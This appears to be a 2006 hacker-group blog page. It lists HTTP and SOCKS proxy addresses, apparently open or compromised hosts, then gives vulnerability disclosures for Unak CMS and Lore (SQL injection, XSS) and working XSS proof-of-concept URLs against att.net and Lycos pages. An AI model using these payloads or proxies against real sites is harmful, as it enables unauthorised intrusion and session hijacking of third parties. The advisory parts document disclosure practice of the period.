HTTP: 85.137.20.225:13664
Sock: 85.137.20.225:41080
SPAIN, -, -

HTTP: 65.74.86.12:25740
Sock: 65.74.86.12:4778
UNITED STATES, KODIAK, ALASKA

HTTP: 68.12.79.131:19200
Sock: 68.12.79.131:23696
UNITED STATES, OKLAHOMA CITY, OKLAHOMA

HTTP: 201.58.156.144:29653
Sock: 201.58.156.144:9521
BRAZIL, -, -

HTTP: 68.11.229.251:8060
Sock: 68.11.229.251:52868
UNITED STATES, BATON ROUGE, LOUISIANA

HTTP: 70.127.3.45:54696
Sock: 70.127.3.45:35560
UNITED STATES, HERNDON, VIRGINIA

HTTP: 84.56.171.51:48700
Sock: 84.56.171.51:14620
GERMANY, STUTTGART, BADEN-WURTTEMBERG

HTTP: 218.11.16.242:14934
Sock: 218.11.16.242:46344
CHINA, HEBEI, HEBEI

Vulnerabilities and Public +personal...

In few monthes i had posted reported some harmfull* vulnerabilities, but i think is enough for me.
My friend der4444 some time ago had writen that public exploits s*cks, in my case there was no public exploits or some how to* for those guys who call themselfes "hackers".
I will post/report maximum 10-15 more , and thats will be end.
Of offcourse not for us , not for you .. just for me.
I think that VietMafia will continue sharing in public part of his job and time.
In my case if i had before few minutes at school to check&report some security holes , than now its over with my free time.
Even i tried to manage my time for my small hobby,..but...but... oh..yeah ..summer is in europe too:) So maybe i will continue with my reports on autumn , i hope so..

And of course in summer i will not have enough time to learn english , thats means those who had&have problems with my english writing style/grammar will also in future have same problems.. In my native language you will not find any translator wich will work with my style* , so i think i will continue typing in something similar to english.

About blog and forum, they will exist as always .

Even end will come soon ...im still r0t.

Unak CMS vuln.

###############################################
Vuln. discovered by : r0t
Date: 2 june 2006
vendor:http://www.unak.net
affected versions:1.5 RC2 and prior
###############################################

Vuln. Description:


1) Input passed to the "u_a" and "u_s" parameters is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2) Input to the "u_a" and "u_s" parameters is also not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Thursday, June 01, 2006

Lore <=1.5.6 SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 1 june 2006
vendor:http://www.pineappletechnologies.com/products/lore/
affected versions:1.5.6 and prior
###############################################

Vuln. Description:

Lore contains a flaw that allows a remote sql injection attacks.Input passed to the "article_id" parameter in "comment.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
Status:
reported to vendor
###############################################
More information @ unsecured-systems.com/forum/

mchsi.com + att.net XSS&Full path disclosure

As always nothin' special ,similar stuff to lycos .

http://ackley.mediacomtoday.com/community/news/
video/index.php?id=0531dvs_dozier_ER&ds=Full Path :)

http://communities.att.net/pe/action/profile
/resetpassword?returnUrl=[XSS]

XSS in Lycos.com

Here will be some examples:

https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=
6&m_PR=2&m_CBURL=%22%3Cscript%3Ealert('r0t')%3C/script%3E

https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=6&m_PR
=2&m_CBURL=http%3A%2F%2Fpridels.blogspot.com%2F&m_CBERRURL
=%22%3Cscript%3Ealert('r0t')%3C/script%3E

https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=6&m_PR=2
&m_CBURL=http%3A%2F%2Fpridels.blogspot.com%2F&m_CBERRURL=ht
tp%3A%2F%2Fpridels.blogspot.com%2F&m_LANG=1&Z=1149121877&m_
AL=2&m_DL_FREE=%22%3Cscript%3Ealert('r0t')%3C/script%3E



ps.lycos contains alot more XSS and other vuln.
I dont know how much can cost db from lycos:)

 
Copyright (c) 2006 Pridels Sec Crew